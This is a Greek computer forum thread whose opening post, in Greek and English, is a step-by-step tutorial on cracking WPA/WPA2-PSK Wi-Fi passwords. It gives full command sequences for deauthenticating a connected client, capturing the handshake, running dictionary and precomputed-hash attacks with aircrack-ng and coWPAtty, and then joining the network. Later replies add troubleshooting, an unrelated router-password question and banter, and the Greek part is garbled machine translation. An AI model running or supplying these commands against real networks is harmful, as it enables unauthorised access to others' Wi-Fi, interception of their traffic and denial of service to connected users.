Μετάβαση στο περιεχόμενο

Welcome to gamato.biz

Καλώς ήλθατε στο forum του gamato.biz!

Το Gamato.biz, σας προσκαλεί να γνωριστούμε, να ανταλλάξουμε απόψεις, να σας βοηθήσουμε με προβλήματα γύρω από το PC σας, και να περάσουμε ευχάριστα.

Απλά συνδεθείτε στο λογαριασμό σας.
Αν έχετε ξεχάσει τον κωδικό σας, πατήστε «Ξεχάσατε τον κωδικό πρόσβασης σας;».
Αν δεν έχετε λογαριασμό μπορείτε πολύ εύκολα και πολύ γρήγορα και ΔΩΡΕΑΝ να δημιουργήσετε έναν δικό σας. Εναλλακτικά συνδεθείτε με τον λογαριασμό σας στο Facebook ή το Twitter.

Σας περιμένουμε ;)

Gamato.biz Staff.
Guest Message by DevFuse
 

Cracking WiFi - WPA - WPA2 PSK (AirCrack-ng vs coWPAtty) Greek/Eng+video

- - - - -

13 replies to this topic

#1
MrBillys

    L33T Team

  • Forum Moderators
  • 588 Δημοσιεύσεις:
  • LocationSoviet Union
  • Country Flag
  • Football
Τι είναι αυτό;
Συγκρίνοντας το Aircrack-ng με το coWPAtty, στο χρόνο που χρειάζεται για να σπάσουμε ένα κλειδί WPA2 PSK.
Δείχνει 4 διαφορετικά cracks, ο χρόνος και η ταχύτητα του κρακ (δείτε αποτελέσματα).
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> CoWPAtty (Dictionary)
> CoWPAtty & Genpmk (Pre-computed hashes)

Πώς λειτουργεί;
Για να σπασει WPA/WPA2 PSK προστασια θα πρέπει να συλλάβει «HandShake». Ο καλύτερος τρόπος για αυτό το πακέτο ο εισβολέας θα πρέπει να αποσυνδέσετε ένα συνδεδεμένο πελάτη επί του παρόντος στο δίκτυο (εάν ο εισβολέας συνεχίζει να επαναλαμβάνει αυτό το μέρος, θα είναι μια DoS προς το χρήστη).

Μόλις το κλειδί πακέτο έχει συλληφθεί, είναι καιρός να ξεκινήσετε μια σύνδεση Dictionary επίθεση. Αν το κλειδί δικτύου υπαρχή στο Dictionary, ακριβώς ένα θέμα της αναμονής για την επεξεργασία του αρχείου Dictionary.

Από εδώ, ο εισβολέας μπορεί να χρησιμοποιήσει αυτό το κλειδί για την αποκρυπτογράφηση του δεδομένων που έχουν καταγραφεί από πριν, και τώρα είναι σε θέση να «διαβάζουν» αυτήν, καθώς ενταχθεί το δίκτυο.

Εάν δεν υπάρχει συνδεδεμένο πελάτη - λοξοτομείτε το κάνετε αυτό. Εάν το δίκτυο κλειδί δεν υπαρχή στο αρχείο Dictionary - λοξοτομείτε το κάνετε αυτό.

Μπορείτε να επιταχύνετε τη διαδικασία της πυρόλυσης με τη δημιουργία Pre-computed Hash (βλέπε αποτελέσματα - για το πόσο γρήγορα!)

Αποτελέσματα
Aircrack-ng είναι καλύτερο με Dictionary attack, ενώ coWPAtty & Genpmk είναι καλύτερα με Pre-computed hashes (επίσης χρειάζεται περισσότερο χρόνο για τον υπολογισμό τους!)

Τι χρειάζομαι;
> Aircrack-ng suite
> WiFi κάρτα που υποστηρίζει τον τρόπο παρακολουθεί (Monitor Mode)
> Μεγάλη Dictionary
> Επεξεργαστική ισχύς

Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page:
http://www.aircrack-ng.org/doku.php


Download Link:
http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz


Name: coWPAtty
Version: 4.3
Home Page:
http://www.willhackforsushi.com/Cowpatty.html


Download Link:
http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz


Commands:

Παράθεση

airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel (εδω το Channel του) --write output --bssid (εδώ βάζουμε το bssid του δικτύου) mon0

aireplay-ng --deauth 1 -a (εδώ βάζουμε το bssid του δικτύου) -c (εδώ βάζουμε το bssid του συνδεόμενου θύματος στο δίκτυο) mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt (εδώ που έχουμε την dictionary μας)



airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt (εδώ που έχουμε την dictionary μας)
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap



cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt  (εδώ που έχουμε την dictionary μας)



genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt (εδώ που έχουμε την dictionary μας)
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash



wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1


και ένα βίντεο :
Cracking WiFi - WPA_WPA2 PSK (AirCrack-ng vs coWPAtty)

Αγγλικα :

What is this?
Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
It shows 4 different cracks, the time taken and speed of the crack (see results).
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> coWPAtty (Dictionary)
> coWPAtty & Genpmk (Pre-computed hashes)


How does this work?
To crack WPA/WPA2 PSK you need to capture a Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).

Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.

From here, the attacker can use that key to decrypt the captured data from before, and now is able to read’ it as well as join the network.

If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.

You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)

Results
Aircrack-ng is better with dictionary attack, whereas coWPAtty & Genpmk is better with Pre-computed hashes (also takes longer to calculate them!)

What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page:
http://www.aircrack-ng.org/doku.php


Download Link:
http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz


Name: coWPAtty
Version: 4.3
Home Page:
http://www.willhackforsushi.com/Cowpatty.html


Download Link:
http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz


Commands:

Παράθεση

airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt



airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap



cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt



genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash



wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1


video

Cracking WiFi - WPA_WPA2 PSK (AirCrack-ng vs coWPAtty)

#2
anestakos

    Αθερίνα

  • Members
  • 1 Δημοσιεύσεις:
  • LocationParisi
Για WEP λειτουργεί εξαιρετικά, για WPA και WPA2 όμως χωλαίνει λίγο.

Φτάνει μέχρι το

"aireplay-ng --deauth 1 -a (εδώ βάζουμε το bssid του δικτύου) -c (εδώ βάζουμε το bssid του συνδεόμενου θύματος στο δίκτυο) mon0"

Όταν λοιπόν στο επόμενο βήμα γράφουμε το

"aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt"

η απάντηση είναι:

fopen(dictionary) failed: No such file or directory
fopen(dictionary) failed: No such file or directory
Opening output-01.cap
Read 13935 packets.

# BSSID ESSID Encryption

1 ****** ****** WPA (1 hadshake)

Choosing first network as target.

Opening output-01.cap
Please specify a dictionary (option -w).

Quitting aircrack-ng...

Σας ευχαριστώ εκ των προτέρων.

Το περίεργο είναι ότι με τις ίδιες εντολές σε WEP δούλεψε δύο φορές κανονικά!!

#3
tzixosma

    Αθερίνα

  • Members
  • 3 Δημοσιεύσεις:
  • Location-
Γεια σας
Ποίος μπορεί να απαντήσει στο εξής ερώτημα μου:
Έχω ένα ρούτερ ΤHOMSON TG585 v7 πως μπορώ
να κλειδώσω το μενου? Δηλαδή να πατάω
http://192.168.1.254/ να ζητάει κωδικό ?? ?? ??
Το email μου: osmantzatzixat@windowslive.com
Ευχαριστώ πολύ


edit by mamakos: Μετάφραση από greeklish στα Ελληνικά. Απαγορεύετε να γράφετε στα greeklish. Παρακαλώ να διαβάσετε τους Κανόνες
Επίσης σας συμβουλεύω να μην δίνετε στοιχεία σας στην δημοσιότητα. Η βοήθεια από το φόρουμ μας παρέχετε μόνο μέσα από τοπικς.

Αυτή το μήνυμα έχει επεξεργαστεί από mamakos: 18 February 2011 - 06:24 PM
Μετάφραση από greeklish στα Ελληνικά


#4
admin

    Administrator

  • Administrators
  • 1306 Δημοσιεύσεις:
  • LocationThessaloniki
  • Country Flag
Καλημέρα, θα μπείς σε αυτη τη διευθυνση καταρχην http://192.168.1.1/ και μέσα στο ρούτερ σου λεει "Κλείδωμα" για όνομα έχει το Admin εσύ για κωδικό βάλε κατι που να θυμάσαι (παραδειγμα εγω τωρα που πηγα να σε βοηθήσω δε το θυμάμαι και εχω κλειδωθεί απέξω χαχα) και αν σου ζητάει να γίνει ενεργοποίηση του κλειδώματος πατα ΝΑΙ ή βάλε ΤΙΚ.

#5
tzixosma

    Αθερίνα

  • Members
  • 3 Δημοσιεύσεις:
  • Location-
Λίγο πιο αναλυτικά δεν μπορείτε να μου εξηγήσετε
και η ερώτηση ήταν η εξής:

Έχω ένα ρουτερ THOMSON TG585 v7 πως μπορώ
να κλειδώσω το μενού. Δηλαδή όταν πατάω
http://192.168.1.254/ να ζητάει κωδικό ?? ?? ??
το e-mail μου : osmantzatzixat@windowslive.com
ευχαριστώ πολύ.

edit by mamakos: Μετάφραση από greeklish στα Ελληνικά. Απαγορεύετε να γράφετε στα greeklish. Παρακαλώ να διαβάσετε τους Κανόνες
Επίσης σας συμβουλεύω να μην δίνετε στοιχεία σας στην δημοσιότητα. Η βοήθεια από το φόρουμ μας παρέχετε μόνο μέσα από τοπικς.

Αυτή το μήνυμα έχει επεξεργαστεί από mamakos: 18 February 2011 - 06:21 PM
μετάφραση απο greeklish στα Ελληνικα


#6
x4r7s

    PC-Team

  • Members
  • 2120 Δημοσιεύσεις:
  • LocationSanta Barbara
  • Country Flag
  • Football
Αδερφέ κατ' αρχήν γράφε ελληνικά!
Κατά δεύτερον:

Είσαι σίγουρος ότι δεν έχει κωδικό? Στο λέω γιατί όλα τα ρούτερ έχουν και εσύ μπορεί απλά να έχεις αποθηκεύσει τον κωδικό στον browser σου και να μπαίνει αυτόματα. Τσέκαρε το μία..

#7
x4r7s

    PC-Team

  • Members
  • 2120 Δημοσιεύσεις:
  • LocationSanta Barbara
  • Country Flag
  • Football
Επίσης πες μας αν ο πάροχός σου είναι ο ΟΤΕ!

#8
tzixosma

    Αθερίνα

  • Members
  • 3 Δημοσιεύσεις:
  • Location-
το τσεκαρα αλλα και παλι το ιδιο πραμα μου κανει.
μπορειτε να μου πειτε τα βηματα για να το κανω?
ευχαριστω και σορρυ....

#9
x4r7s

    PC-Team

  • Members
  • 2120 Δημοσιεύσεις:
  • LocationSanta Barbara
  • Country Flag
  • Football
Επειδή δεν έχω το εν λόγω ρούτερ μήπως μπορείς να με βοηθήσεις βγάζοντας φωτογραφία ή γράφοντας εδώ τις επιλογές που σου έχει στην κατηγορία Toolbox όταν συνδέεσαι στο ρούτερ στο 192.168.1.254?

#10
Bentley

    Αθερίνα

  • Members
  • 294 Δημοσιεύσεις:
  • LocationHacker Detected
ωραίος οδηγός ! σε ευχαριστώ http://community.gam...tyle_emoticons/default/smiley.gif

#11
MrBillys

    L33T Team

  • Forum Moderators
  • 588 Δημοσιεύσεις:
  • LocationSoviet Union
  • Country Flag
  • Football
τπτ

#12
guest

    Αθερίνα

  • Members
  • 15 Δημοσιεύσεις:
  • Locationneverland
@ devilbill:

1. you know you're not even a skidie, right?
2. μετάφραση από translator. no comment.. -.-
3. καταλαβαίνεις το copy-paste που έχεις κάνει τι λέει?
4. please σβήσε την υπογραφή σου. you are embarrassing yourself

#13
x4r7s

    PC-Team

  • Members
  • 2120 Δημοσιεύσεις:
  • LocationSanta Barbara
  • Country Flag
  • Football
http://www.gamato.bi...tyle_emoticons/default/laugh.gif http://www.gamato.bi...tyle_emoticons/default/laugh.gif http://www.gamato.bi...tyle_emoticons/default/laugh.gif http://www.gamato.bi...tyle_emoticons/default/laugh.gif

#14
MrBillys

    L33T Team

  • Forum Moderators
  • 588 Δημοσιεύσεις:
  • LocationSoviet Union
  • Country Flag
  • Football

Εμφάνιση δημοσιεύσεωνguest, κατά 01 May 2011 - 08:24 AM, λόγο:

@ devilbill:

1. you know you're not even a skidie, right?
2. μετάφραση από translator. no comment.. -.-
3. καταλαβαίνεις το copy-paste που έχεις κάνει τι λέει?
4. please σβήσε την υπογραφή σου. you are embarrassing yourself


ναι όλα αυτά τα ξέρω... και η υπογραφή δεν βγαίνει γαμάτη είναι :D

1.όχι δεν είμαι...
2. γιαυτό υπάρχει και το αγγλικό κείμενο...
3.απάντησα το 2
4.απάντησα πιο πάνω...





1 Χρήστης (ες) διαβάζουν αυτό το θέμα

0 μέλη, 1 επισκέπτες, 0 ανώνυμοι χρήστες